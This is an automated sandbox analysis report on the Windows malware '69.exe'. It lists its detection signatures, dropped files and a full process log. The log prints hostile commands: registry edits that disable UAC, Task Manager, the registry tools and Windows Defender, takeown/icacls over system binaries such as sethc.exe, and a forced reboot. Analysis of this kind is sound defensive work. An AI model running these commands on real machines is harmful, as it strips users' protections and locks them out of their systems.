Analysis Overview
SHA256
6606052fe50484563254b45f679dcbb9d42fff8ede7e8dba609e2760a5e0b3b7
Threat Level: Known bad
The file 69.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Stops running service(s)
Possible privilege escalation attempt
Disables Task Manager via registry modification
Modifies system executable filetype association
Modifies file permissions
Executes dropped EXE
Enumerates connected drives
Drops file in System32 directory
Sets desktop wallpaper using registry
Launches sc.exe
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Modifies registry class
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-21 19:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-21 19:40
Reported
2024-09-21 19:41
Platform
win11-20240802-en
Max time kernel
9s
Max time network
25s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables Task Manager via registry modification
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\PerfLogs\windows\exec.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\jumpscare.exe | N/A |
| N/A | N/A | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\System32\takeown.exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\P: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\unregmp2.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\unregmp2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\taskmgr.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\sethc.exe | C:\Windows\system32\cmd.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Control Panel\Desktop\Wallpaper = "C:\\PerfLogs\\windows\\creepy69.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\regedit.exe | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\exec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\jumpscare.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PerfLogs\windows\rnbowspam.exe | N/A |
Delays execution with timeout.exe
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\69.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\ = "C:\\PerfLogs\\windows\\icn.ico" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1287768749-810021449-2672985988-1000\{0DB9049D-F888-42FF-A23B-8D95A9FFEB5B} | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\unregmp2.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Media Player\wmplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\69.exe
"C:\Users\Admin\AppData\Local\Temp\69.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\PerfLogs\windows\warn.vbs"
C:\PerfLogs\windows\exec.exe
"C:\PerfLogs\windows\exec.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat C:\PerfLogs\windows\exec.exe"
C:\PerfLogs\windows\jumpscare.exe
jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
rnbowspam.exe
C:\Windows\System32\takeown.exe
takeown /f taskmgr.exe
C:\Windows\System32\takeown.exe
takeown /f sethc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\jumpscare.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat C:\PerfLogs\windows\rnbowspam.exe"
C:\Windows\System32\icacls.exe
icacls "sethc.exe" /granted "Admin":F
C:\Windows\System32\icacls.exe
icacls "taskmgr.exe" /granted "Admin":F
C:\Program Files\Windows Media Player\wmplayer.exe
wmplayer.exe "C:\PerfLogs\windows\tape.mp4"
C:\Windows\System32\takeown.exe
takeown /f reg.exe
C:\Windows\System32\icacls.exe
icacls "reg.exe" /granted "Admin":F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\System32\unregmp2.exe
"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
C:\Windows\system32\takeown.exe
takeown /f regedit.exe
C:\Windows\system32\icacls.exe
icacls "regedit.exe" /granted "Admin":F
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFolderOptions /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableLockWorkstation /t REG_DWORD /d 1 /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoLogoff /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\PerfLogs\windows\creepy69.jpg" /f
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop" /v NoChangingWallpaper /t REG_DWORD /d 1 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\exefile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\txtfile\DefaultIcon" /t REG_SZ /d "C:\PerfLogs\windows\icn.ico" /f
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004F0 0x00000000000004E4
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\system32\sc.exe
sc stop WinDefend
C:\Windows\system32\sc.exe
sc config WinDefend start=disabled
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K rainbow.bat
C:\Windows\system32\timeout.exe
timeout /t 1
C:\Windows\system32\timeout.exe
timeout /t 0
C:\Windows\system32\shutdown.exe
shutdown -r -t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3936055 /state1:0x41c64e6d
C:\Windows\system32\timeout.exe
timeout /t 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.56.20.217.in-addr.arpa | udp |
Files
C:\PerfLogs\windows\warn.vbs
C:\PerfLogs\windows\exec.exe
C:\Users\Admin\AppData\Local\Temp\A2F7.tmp\A2F8.tmp\A2F9.bat
C:\PerfLogs\windows\jumpscare.exe
C:\PerfLogs\windows\rnbowspam.exe
C:\Users\Admin\AppData\Local\Temp\A41F.tmp\A420.tmp\A421.bat
C:\Users\Admin\AppData\Local\Temp\A420.tmp\A420.tmp\A421.bat
C:\PerfLogs\windows\rainbow.bat
C:\PerfLogs\windows\69rnspam.exe
C:\PerfLogs\windows\logon_overwrte.exe
C:\PerfLogs\windows\killrunas.vbs
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt
C:\PerfLogs\windows\tape.mp4
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb